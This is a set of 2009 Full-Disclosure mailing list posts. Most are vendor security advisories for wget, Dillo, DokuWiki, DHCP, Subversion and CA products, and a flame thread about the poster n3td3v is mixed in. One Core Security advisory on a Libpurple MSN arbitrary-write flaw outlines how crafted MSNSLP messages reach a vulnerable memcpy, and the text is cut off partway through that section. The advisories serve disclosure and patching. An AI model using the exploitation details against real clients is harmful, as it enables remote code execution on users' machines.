Re: [Full-disclosure] False statements made about security researcher n3td3v
n3td3v is neither black-, white-, purple- or anything -hat, just a troll. i follow this list since 4 years and everything i read about n3td3v was just a bunch of crap. just like the kids in school that have no friends and keep bugging others for their lost live. so stop trolling with your fake-account, its worthless, senseless and useless AND OFF-TOPIC. someone lawyer schrieb: > List, > > My client setup a mailing list called "n3td3v", he used the user "n3td3v" to > spread the name of the user group so people would know it, since then you > have ridiculed and tormented him, to the degree that he was so upset he had > to be removed from your list. > > There was no need for you to do this to him he is a good guy, he has proved > he has no bad bones in his body before he was removed. > > Why when he isn't any longer on your list you continue to want to believe he > has bad bones in his body when everyone know he is a good guy? He can get > argumentative when he feel need to defend himself when false statements are > made, that don't make him bad. > > He a good guy in the information security world, let it be now don't pretend > of him as a black hat for your entertainment purposes because people scanning > through might not know it as a joke and you could cause damage toward my > client. > > some...@lawyer.com > > - Original Message - > From: valdis.kletni...@vt.edu > To: Full-disclosure@lists.grok.org.uk > Subject: Re: [Full-disclosure] False statements made about security > researcher n3td3v > Date: Tue, 18 Aug 2009 18:24:55 -0400 > > > On Tue, 18 Aug 2009 15:52:36 CDT, someone lawyer said: > >> What funny about my client be targeted by internet trolls? >> > > The self-referential aspects of the situation. > << 1.2.dat >> > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] False statements made about security researcher n3td3v
List, My client setup a mailing list called "n3td3v", he used the user "n3td3v" to spread the name of the user group so people would know it, since then you have ridiculed and tormented him, to the degree that he was so upset he had to be removed from your list. There was no need for you to do this to him he is a good guy, he has proved he has no bad bones in his body before he was removed. Why when he isn't any longer on your list you continue to want to believe he has bad bones in his body when everyone know he is a good guy? He can get argumentative when he feel need to defend himself when false statements are made, that don't make him bad. He a good guy in the information security world, let it be now don't pretend of him as a black hat for your entertainment purposes because people scanning through might not know it as a joke and you could cause damage toward my client. some...@lawyer.com - Original Message - From: valdis.kletni...@vt.edu To: Full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] False statements made about security researcher n3td3v Date: Tue, 18 Aug 2009 18:24:55 -0400 On Tue, 18 Aug 2009 15:52:36 CDT, someone lawyer said: > What funny about my client be targeted by internet trolls? The self-referential aspects of the situation. << 1.2.dat >> ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Be Yourself @ mail.com! Choose From 200+ Email Addresses Get a Free Account at www.mail.com! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2009:206 ] wget
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:206 http://www.mandriva.com/security/ ___ Package : wget Date: August 18, 2009 Affected: 2008.1, 2009.0, 2009.1, Corporate 4.0, Enterprise Server 5.0 ___ Problem Description: A vulnerability has been found and corrected in wget: SUSE discovered a security issue in wget related to http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2408 This update provides a solution to this vulnerability. ___ Updated Packages: Mandriva Linux 2008.1: ea12db02d04adc9fa0b29e7236bc0aff 2008.1/i586/wget-1.11-1.1mdv2008.1.i586.rpm 4bb0f6cea935f1898b16138a9184532d 2008.1/SRPMS/wget-1.11-1.1mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: b5d0178dafabf50dd69b65640794b343 2008.1/x86_64/wget-1.11-1.1mdv2008.1.x86_64.rpm 4bb0f6cea935f1898b16138a9184532d 2008.1/SRPMS/wget-1.11-1.1mdv2008.1.src.rpm Mandriva Linux 2009.0: bede85ae45fadf868872897da49055c2 2009.0/i586/wget-1.11.4-1.1mdv2009.0.i586.rpm 6790666e7840374f76f5713042791800 2009.0/SRPMS/wget-1.11.4-1.1mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: 4c3aa5dc0ff825c091f33a90e6413b18 2009.0/x86_64/wget-1.11.4-1.1mdv2009.0.x86_64.rpm 6790666e7840374f76f5713042791800 2009.0/SRPMS/wget-1.11.4-1.1mdv2009.0.src.rpm Mandriva Linux 2009.1: 22ac17fb90755905810e06ba331aa3f0 2009.1/i586/wget-1.11.4-2.1mdv2009.1.i586.rpm e1cb10f372e5f447c66122cb7e21d838 2009.1/SRPMS/wget-1.11.4-2.1mdv2009.1.src.rpm Mandriva Linux 2009.1/X86_64: ed2db26279ff964b66dab3d1c8131b24 2009.1/x86_64/wget-1.11.4-2.1mdv2009.1.x86_64.rpm e1cb10f372e5f447c66122cb7e21d838 2009.1/SRPMS/wget-1.11.4-2.1mdv2009.1.src.rpm Corporate 4.0: 968c766ddae497261b5771809aadd05c corporate/4.0/i586/wget-1.10-1.3.20060mlcs4.i586.rpm d68c51e4d12cc46284e74bcb3a49d2b3 corporate/4.0/SRPMS/wget-1.10-1.3.20060mlcs4.src.rpm Corporate 4.0/X86_64: b22218a9f0e8d00eba91282955c8ff13 corporate/4.0/x86_64/wget-1.10-1.3.20060mlcs4.x86_64.rpm d68c51e4d12cc46284e74bcb3a49d2b3 corporate/4.0/SRPMS/wget-1.10-1.3.20060mlcs4.src.rpm Mandriva Enterprise Server 5: 9f5a3d71664dc57fb26aebbc19c59fcb mes5/i586/wget-1.11.4-1.1mdvmes5.i586.rpm f3aa17085ae5049ee3a5bf05e3119c43 mes5/SRPMS/wget-1.11.4-1.1mdvmes5.src.rpm Mandriva Enterprise Server 5/X86_64: 3a8dc29a12c1059182edbd8d732bc9df mes5/x86_64/wget-1.11.4-1.1mdvmes5.x86_64.rpm f3aa17085ae5049ee3a5bf05e3119c43 mes5/SRPMS/wget-1.11.4-1.1mdvmes5.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFKiwtSmqjQ0CJFipgRAn13AKCh0YGh/7d6XI+RzW0968xgEIqqLACglzPt /hPdLqxZ869FtuN+jpKVX/M= =NfR+ -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] False statements made about security researcher n3td3v
On Tue, 18 Aug 2009 15:52:36 CDT, someone lawyer said: > What funny about my client be targeted by internet trolls? The self-referential aspects of the situation. pgpivnybqtd3v.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2009-0727: Libpurple msn_slplink_process_msg() Arbitrary Write Vulnerability
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/
Libpurple msn_slplink_process_msg() Arbitrary Write Vulnerability
1. *Advisory Information*
Title: Libpurple msn_slplink_process_msg() Arbitrary Write Vulnerability
Advisory ID: CORE-2009-0727
Advisory URL: http://www.coresecurity.com/content/libpurple-arbitrary-write
Date published: 2009-08-18
Date of last update: 2009-08-18
Vendors contacted: Pidgin team
Release mode: Coordinated release
2. *Vulnerability Information*
Class: Memory corruption
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID:
CVE Name: CVE-2009-2694
3. *Vulnerability Description*
Pidgin (formerly named Gaim) is a multi-platform instant messaging
client, based on a library named libpurple. Libpurple has support for
many commonly used instant messaging protocols, allowing the user to log
into various different services from one application.
A remote arbitrary-code-execution vulnerability has been found in
Libpurple (used by Pidgin and Adium instant messaging clients, among
others), which can be triggered by a remote attacker by sending a
specially crafted MSNSLP packet [4] with invalid data to the client
through the MSN server. No victim interaction is required, and the
attacker is not required to be in the victim's buddy list (under default
configuration).
4. *Vulnerable packages*
. Gaim >= 0.79
. Libpurple <= 2.5.8 (Pidgin <= 2.5.8 and Adium <= 1.3.5)
. Other Libpurple frontends such as Finch might be vulnerable as well.
5. *Non-vulnerable packages*
. Libpurple >= 2.6.0 (Pidgin >= 2.6.0)
6. *Vendor Information, Solutions and Workarounds*
The default privacy settings allow any remote entity to contact an MSN
user, so the attacker is not required to be in the victim's buddy list.
The attack can be mitigated by setting the privacy settings for MSN
accounts to "Allow only the users below" (by default, the list of people
on the buddy list).
7. *Credits*
This vulnerability was discovered and researched by Federico Muttis from
Core Security Technologies.
8. *Technical Description / Proof of Concept Code*
8.1. *Overview*
The flaw exists within the function 'msn_slplink_process_msg()' of
Libpurple <= 2.5.8, which fails to properly validate an offset value
specified in a MSNSLP packet [4].
This affects at least two widely used products: Pidgin <= 2.5.8 [1] and
Adium <= 1.3.5 [2].
According to their website [3], Libpurple is also used by:
. Apollo IM - IM application for the iPhone and iPod Touch.
. EQO - an IM program for mobile phones.
. Finch - a text-based IM program that works well in Linux and other
Unixes.
. Instantbird - a graphical IM program based on Mozilla's XUL framework.
. Meebo - a web-based IM program.
. Telepathy-Haze - a connection manager for the Telepathy IM framework.
These programs may also be vulnerable.
If the victim has its privacy settings set to "everyone can contact me",
the victim is not required to be in the attacker's contact list.
Otherwise that is the only requirement for exploitation and no other
victim interaction is required.
By sending a specially crafted packet, an attacker can write an
arbitrary address with controlled data, resulting in arbitrary code
execution.
8.2. *Previous patches*
A similar vulnerability was already reported in CVE-2008-2927 [5] and
CVE-2009-1376 [6]. CVE-2008-2927 added some bounds checking in
'msn_slplink_process_msg()', specifically:
/---
if (G_MAXSIZE - len < offset || (offset='' + len='') > slpmsg->size)
{
.. discard packet ..
} else {
.. vulnerable memcpy ..
}
- ---/
CVE-2009-1376 demonstrates that this can be exploited. The idea of the
patch for CVE-2009-1376 was to fix a casting error, where an unsigned 64
bits integer was casted to an unsigned 32 bits integer in the following
line:
/---
declaration of offset;
...
offset = msg->msnslp_header.offset;
- ---/
The declaration of offset was changed from 'gsize' to 'guint64' in
2.5.8. This approach is clearly not enough, we found that by providing
different size/offset values, the call to memcpy() can still be reached
with almost any value. The first PoC we constructed to trigger this
vulnerability was fixed by the patch introduced in Libpurple 2.5.6, but
by working on it a little more, we triggered the bug again in Libpurple
2.5.8. We conclude that the fix was incomplete.
8.3. *Exploitation of Libpurple 2.5.8*
The attack consists in sending two consecutive MSNSLP messages [4]. The
first one is used to store a 'slpmsg' with our session id, and the
second one to trigger the vulnerability.
Our goal is to reach the 'memcpy()' invocation in
'msn_slplink_process_msg()'. We need to construct a MSNSLP message with
an offset different from zero (as this value will be the destination of
the vulnerable 'memcpy()').
As the offset will be different from zero, the firs
[Full-disclosure] [ GLSA 200908-10 ] Dillo: User-assisted execution of arbitrary code
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200908-10 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Dillo: User-assisted execution of arbitrary code Date: August 18, 2009 Bugs: #276432 ID: 200908-10 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis An integer overflow in the PNG handling of Dillo might result in the remote execution of arbitrary code. Background == Dillo is a graphical web browser known for its speed and small footprint. Affected packages = --- Package / Vulnerable / Unaffected --- 1 www-client/dillo < 2.1.1 >= 2.1.1 Description === Tilei Wang reported an integer overflow in the Png_datainfo_callback() function, possibly leading to a heap-based buffer overflow. Impact == A remote attacker could entice a user to open an HTML document containing a specially crafted, large PNG image, possibly resulting in the execution of arbitrary code with the privileges of the user running the application. Workaround == There is no known workaround at this time. Resolution == All Dillo users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =www-client/dillo-2.1.1 References == [ 1 ] CVE-2009-2294 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2294 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200908-10.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License === Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ GLSA 200908-09 ] DokuWiki: Local file inclusion
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200908-09 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: DokuWiki: Local file inclusion Date: August 18, 2009 Bugs: #272431 ID: 200908-09 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis An input sanitation error in DokuWiki might lead to the dislosure of local files or even the remote execution of arbitrary code. Background == DokuWiki is a standards compliant Wiki system written in PHP. Affected packages = --- Package/Vulnerable/Unaffected --- 1 www-apps/dokuwiki < 2009-02-14b >= 2009-02-14b Description === girex reported that data from the "config_cascade" parameter in inc/init.php is not properly sanitized before being used. Impact == A remote attacker could exploit this vulnerability to execute PHP code from arbitrary local, or, when the used PHP version supports ftp:// URLs, also from remote files via FTP. Furthermore, it is possible to disclose the contents of local files. NOTE: Successful exploitation requires the PHP option "register_globals" to be enabled. Workaround == Disable "register_globals" in php.ini. Resolution == All DokuWiki users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =www-apps/dokuwiki-2009-02-14b References == [ 1 ] CVE-2009-1960 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1960 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200908-09.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License === Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ GLSA 200908-08 ] ISC DHCP: dhcpd Denial of Service
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200908-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: ISC DHCP: dhcpd Denial of Service Date: August 18, 2009 Bugs: #275231 ID: 200908-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis dhcpd as included in the ISC DHCP implementation does not properly handle special conditions, leading to a Denial of Service. Background == ISC DHCP is the reference implementation of the Dynamic Host Configuration Protocol as specified in RFC 2131. Affected packages = --- Package/ Vulnerable /Unaffected --- 1 net-misc/dhcp < 3.1.2_p1 >= 3.1.2_p1 Description === Christoph Biedl discovered that dhcpd does not properly handle certain DHCP requests when configured both using "dhcp-client-identifier" and "hardware ethernet". Impact == A remote attacker might send a specially crafted request to dhcpd, possibly resulting in a Denial of Service (daemon crash). Workaround == There is no known workaround at this time. Resolution == All ISC DHCP users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =net-misc/dhcp-3.1.2_p1 References == [ 1 ] CVE-2009-1892 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1892 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200908-08.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License === Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ GLSA 200908-07 ] Perl Compress::Raw modules: Denial of Service
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200908-07 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Perl Compress::Raw modules: Denial of Service Date: August 18, 2009 Bugs: #273141, #281955 ID: 200908-07 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis An off-by-one error in Compress::Raw::Zlib and Compress::Raw::Bzip2 might lead to a Denial of Service. Background == Compress::Raw::Zlib and Compress::Raw::Bzip2 are Perl low-level interfaces to the zlib and bzip2 compression libraries. Affected packages = --- Package / Vulnerable / Unaffected --- 1 perl-core/Compress-Raw-Zlib< 2.020 >= 2.020 2 perl-core/Compress-Raw-Bzip2 < 2.020 >= 2.020 --- 2 affected packages on all of their supported architectures. --- Description === Leo Bergolth reported an off-by-one error in the inflate() function in Zlib.xs of Compress::Raw::Zlib, possibly leading to a heap-based buffer overflow (CVE-2009-1391). Paul Marquess discovered a similar vulnerability in the bzinflate() function in Bzip2.xs of Compress::Raw::Bzip2 (CVE-2009-1884). Impact == A remote attacker might entice a user or automated system (for instance running SpamAssassin or AMaViS) to process specially crafted files, possibly resulting in a Denial of Service condition. Workaround == There is no known workaround at this time. Resolution == All Compress::Raw::Zlib users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =perl-core/Compress-Raw-Zlib-2.020 All Compress::Raw::Bzip2 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =perl-core/Compress-Raw-Bzip2-2.020 References == [ 1 ] CVE-2009-1391 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1391 [ 2 ] CVE-2009-1884 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1884 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200908-07.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License === Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ GLSA 200908-06 ] CDF: User-assisted execution of arbitrary code
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200908-06 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: CDF: User-assisted execution of arbitrary code Date: August 18, 2009 Bugs: #278679 ID: 200908-06 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple heap-based buffer overflows in CDF might result in the execution of arbitrary code. Background == CDF is a library for the Common Data Format which is a self-describing data format for the storage and manipulation of scalar and multidimensional data. It is developed by the NASA. Affected packages = --- Package / Vulnerable / Unaffected --- 1 sci-libs/cdf < 3.3.0 >= 3.3.0 Description === Leon Juranic reported multiple heap-based buffer overflows for instance in the ReadAEDRList64(), SearchForRecord_r_64(), LastRecord64(), and CDFsel64() functions. Impact == A remote attacker could entice a user to open a specially crafted CDF file, possibly resulting in the execution of arbitrary code with the privileges of the user running the application, or a Denial of Service. Workaround == There is no known workaround at this time. Resolution == All CDF users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =sci-libs/cdf-3.3.0 References == [ 1 ] CVE-2009-2850 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2850 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200908-06.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License === Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ GLSA 200908-05 ] Subversion: Remote execution of arbitrary code
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200908-05 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: Subversion: Remote execution of arbitrary code Date: August 18, 2009 Bugs: #280494 ID: 200908-05 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple integer overflows, leading to heap-based buffer overflows in the Subversion client and server might allow remote attackers to execute arbitrary code. Background == Subversion is a versioning system designed to be a replacement for CVS. Affected packages = --- Package / Vulnerable / Unaffected --- 1 dev-util/subversion < 1.6.4>= 1.6.4 Description === Matt Lewis of Google reported multiple integer overflows in the libsvn_delta library, possibly leading to heap-based buffer overflows. Impact == A remote attacker with commit access could exploit this vulnerability by sending a specially crafted commit to a Subversion server, or a remote attacker could entice a user to check out or update a repository from a malicious Subversion server, possibly resulting in the execution of arbitrary code with the privileges of the user running the server or client. Workaround == There is no known workaround at this time. Resolution == All Subversion users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =dev-util/subversion-1.6.4 References == [ 1 ] CVE-2009-2411 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2411 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200908-05.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License === Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] False statements made about security researcher n3td3v
List,
What funny about my client be targeted by internet trolls?
some...@lawyer.com
- Original Message -
From: "Andrew Kuriger"
To: Full-disclosure@lists.grok.org.uk
Cc: Full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] False statements made about security researcher
n3td3v
Date: Tue, 18 Aug 2009 14:53:20 -0500
Dude really?
Nice signature: "Be Yourself @ mail.com!
Choose From 200+ Email Addresses
Get a Free Account at www.mail.com!"
Nobody cares. I just find it funny.
On Tue, 18 Aug 2009 14:43:15 -0500, "someone lawyer"
wrote:
> List,
>
> Below are (malice) false statements about my client.
>
> Thu Jul 16 13:54:34 BST 2009 ureleet at gmail.com "n3td3v is
> posting as ant-sec"
>
> "he is hacking and spreading disinformation on
> full-d."
>
> http://lists.grok.org.uk/pipermail/full-disclosure/2009-July/069692.html
>
> Sun Jul 26 02:40:47 BST 2009
>
> antisecav at hushmail.com "Breaking: antisec and n3td3v
> responsible for Matasano hacking"
>
> "n3td3v/antisec is proud to announce official partnership with
> antisec ("the scene")"
>
> http://lists.grok.org.uk/pipermail/full-disclosure/2009-July/069878.html
>
> some...@lawyer.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--
Be Yourself @ mail.com!
Choose From 200+ Email Addresses
Get a Free Account at www.mail.com!
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CA20090818-01: Security Notice for CA Host-Based Intrusion Prevention System
-BEGIN PGP SIGNED MESSAGE- CA20090818-01: Security Notice for CA Host-Based Intrusion Prevention System Issued: August 18, 2009 CA's technical support is alerting customers to a security risk with CA Host-Based Intrusion Prevention System. A vulnerability exists that can allow a remote attacker to cause a denial of service. CA has issued a patch to address the vulnerability. The vulnerability, CVE-2009-2740, is due to the kmxIds.sys driver not correctly handling certain malformed packets. An attacker can send a malicious packet that will cause a kernel crash. Risk Rating High Platform Windows Affected Products CA Host-Based Intrusion Prevention System 8.1 Non-Affected Products CA Host-Based Intrusion Prevention System 8.1 CF 1 How to determine if the installation is affected 1. Using Windows Explorer, locate the file "kmxIds.sys". By default, the file is located in the "C:\Windows\system32\drivers\" directory. 2. Right click on the file and select Properties. 3. Select the Version tab. 4. If the file version is less than indicated in the below table, the installation is vulnerable. File Name Version Size(bytes) Date kmxIds.sys 7.3.1.18 163,840 June 03, 2009, 12:32:22 PM Solution CA has issued the following patch to address the vulnerability. CA Host-Based Intrusion Prevention System 8.1: Install Cumulative Fix 1 RO10298. References CVE-2009-2740 - HIPS kmxIds.sys remote crash http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2740 CA20090818-01: Security Notice for CA Host-Based Intrusion Prevention System (line may wrap) https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=21 4665 Acknowledgement CVE-2009-2740 - iViZ Security Research Team Change History Version 1.0: Initial Release If additional information is required, please contact CA Support at http://support.ca.com/ If you discover a vulnerability in CA products, please report your findings to the CA Product Vulnerability Response Team. (line may wrap) https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=17 7782 Kevin Kotas CA Product Vulnerability Response Team -BEGIN PGP SIGNATURE- Version: PGP 8.1 iQEVAwUBSosQJJI1FvIeMomJAQFFEAf+IcKJCxu2tj2cO24u8Hp3nQIeCyAAJITU Fdsmn/RRDNKPXm6fCPVbeK7rnvCGRuSmEOXPT+H+Y8S5ruppUqf4kuehkvhaW3N+ m5xjiC4BnACtPO6HE2q4JelgAdb0mKWIWnbn6ydWXKvBKViUQU4cAirCxRw7zj7P lrfm+V6hun7s6FTF7IccdGTJDhxXOCo9Q++FGLaOvaXJiXSS+HvzTM7MzbAEa5yy TosaTPGrnYO8FzQz+P/HFlCYsD6IKjCfMy1C63Qp7xCFWZ6ltJSKEIUYLu/DJlWu z2JUzNXn4lqNXoDLOAuBHawMiJesPXshjFqFG0kdeRxvP4JMUhENOQ== =AsHd -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CA20090818-02: Security Notice for CA Internet Security Suite
-BEGIN PGP SIGNED MESSAGE- CA20090818-02: Security Notice for CA Internet Security Suite Issued: August 18, 2009 CA's technical support is alerting customers to a security risk with CA Internet Security Suite. A vulnerability exists that can allow a local attacker to cause a denial of service. CA has issued updates to address the vulnerability. The vulnerability, CVE-2009-0682, is due to insufficient verification of IOCTL calls by the vetmonnt.sys driver. An attacker can send a malicious IOCTL call that will cause a crash. Risk Rating Medium Platform Windows Affected Products CA Internet Security Suite r3 CA Internet Security Suite r4 32 bit CA Internet Security Suite r5 32 bit How to determine if the installation is affected - From the Internet Security Suite user interface, select Help->About to show the version. If the displayed version is less than what is indicated in the below table, the installation is vulnerable. Product Version Internet Security Suite r4 9.0.0.184 Internet Security Suite r5 10.0.0.217 Solution CA Internet Security Suite r3: Upgrade to Internet Security Suite r5 and apply the latest updates. CA Internet Security Suite r4 32 bit, CA Internet Security Suite r5 32 bit: Ensure automatic update is enabled and once updated, confirm the version as described in the How to determine if the installation is affected section. References CVE-2009-0682 - vetmonnt.sys IOCTL crash http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0682 CA20090818-02: Security Notice for CA Internet Security Suite (line may wrap) https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=21 4673 Acknowledgement CVE-2009-0682 - Nikita Tarakanov, Positive Technologies Research Team Change History Version 1.0: Initial Release If additional information is required, please contact CA Support at http://support.ca.com/ If you discover a vulnerability in CA products, please report your findings to the CA Product Vulnerability Response Team. (line may wrap) https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=17 7782 Kevin Kotas CA 